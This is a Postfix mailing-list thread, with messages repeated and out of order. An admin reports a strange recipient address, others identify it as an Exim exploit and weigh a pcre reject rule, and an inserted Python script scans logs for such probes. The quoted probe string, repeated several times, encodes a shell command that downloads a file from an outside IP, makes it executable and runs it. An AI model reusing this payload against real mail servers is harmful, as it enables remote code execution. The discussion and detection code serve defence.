Joe Acquisto-j4:
> kris_h:
>> Hey Wietse,
>>
>> thank you for this clarification.
>>
>> What do you think about using the reject-recipient /\$\{/-rule?
>
> As a temporary rule, it may have made sense when the Exim bug was new.
>
> As a permanent 'deny' rule, it won't block new exploits.
>
> Wietse
> As a temporary rule, it may have made sense when the Exim bug was new.
> As a permanent 'deny' rule, it won't block new exploits.
Yes, you're right, each additional PCRE rule is one more to be passed for each
recipient...
Thanks
Kris
--
Sent from: http://postfix.1071664.n5.nabble.com/Postfi
kris_h:
> Hey Wietse,
>
> thank you for this clarification.
>
> What do you think about using the reject-recipient /\$\{/-rule?
As a temporary rule, it may have made sense when the Exim bug was new.
As a permanent 'deny' rule, it won't block new exploits.
Wietse
Hey Wietse,
thank you for this clarification.
What do you think about using the reject-recipient /\$\{/-rule?
Kris
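To see what kris_h's proposed `/\$\{/` recipient check would actually catch, here is an added log-scanning example (not code from the thread or from Postfix): it applies the same literal `${` test to the envelope recipient of each smtpd RCPT line. The log lines, client IPs and the `PAYLOAD-ELIDED` placeholder are all constructed.

```python
"""Scan Postfix smtpd log lines for recipients containing the Exim "${"
expansion syntax, i.e. what a pcre check_recipient_access rule /\\$\\{/
would reject. Added example; sample data below is constructed."""
import re

# Constructed sample log lines. The first and fourth recipients mirror the
# shape of the probe quoted in the thread, with the payload replaced by a marker.
SAMPLE_LOG = """\
Mar 12 16:40:01 mx postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <root+${run{PAYLOAD-ELIDED}}@localhost>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<root+${run{PAYLOAD-ELIDED}}@localhost> proto=ESMTP helo=<scanner>
Mar 12 16:41:09 mx postfix/smtpd[1234]: 4ABC123: client=mail.example.org[203.0.113.5]
Mar 12 16:41:10 mx postfix/qmgr[1200]: 4ABC123: from=<alice@example.org>, size=1234, nrcpt=1 (queue active)
Mar 12 16:42:33 mx postfix/smtpd[1235]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 554 5.7.1 <bob+${lookup{x}}@example.com>: Recipient address rejected: Access denied; from=<probe@example.net> to=<bob+${lookup{x}}@example.com> proto=ESMTP helo=<scanner>
Mar 12 16:43:00 mx postfix/smtpd[1236]: NOQUEUE: reject: RCPT from unknown[198.51.100.11]: 550 5.1.1 <nobody@localhost>: Recipient address rejected: User unknown in local recipient table; from=<x@example.net> to=<nobody@localhost> proto=ESMTP helo=<scanner>
"""

# Same test as the proposed pcre table rule: a literal "${" anywhere in the recipient.
EXIM_EXPANSION = re.compile(r"\$\{")

# Pull the connecting client address and the envelope recipient out of an smtpd line.
SMTPD_RCPT = re.compile(
    r"postfix/smtpd\[\d+\]: .*?from \S+\[(?P<ip>[^\]]+)\].*? to=<(?P<rcpt>[^>]*)>"
)


def find_exim_probes(log_text):
    """Return (client_ip, recipient) for every smtpd RCPT line whose recipient
    contains "${". Non-smtpd lines and ordinary recipients are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = SMTPD_RCPT.search(line)
        if m and EXIM_EXPANSION.search(m.group("rcpt")):
            hits.append((m.group("ip"), m.group("rcpt")))
    return hits


def probes_by_client(log_text):
    """Count probe attempts per client IP, e.g. as input for an abuse report."""
    counts = {}
    for ip, _ in find_exim_probes(log_text):
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, rcpt in find_exim_probes(SAMPLE_LOG):
        print(f"{ip}\t{rcpt}")
```

Against the sample, only the two `${...}` recipients are flagged; as Wietse notes above, this catches the known pattern, not new exploits, so it is a triage aid rather than a permanent control.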
Kevin A. McGrail:
>
> On 3/12/2020 4:40 PM, kris_h wrote:
> > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
>
> It's an exim exploit. See CVE-2019-15846.
The above is very similar to the Exim exploit for CVE-2019-10149 in
https://www
> It's an exim exploit. See CVE-2019-15846.
@KAM
Thanks a lot for this really quick reply!
On 3/12/2020 4:40 PM, kris_h wrote:
> root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
It's an exim exploit. See CVE-2019-15846.
Regards,
KAM
Hey
I found this crazy recipient address in my Postfix logs:
root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
Seems that someone tries to download something with wget, then chmod 'x'
and finally execute the downloaded crap.
Is there a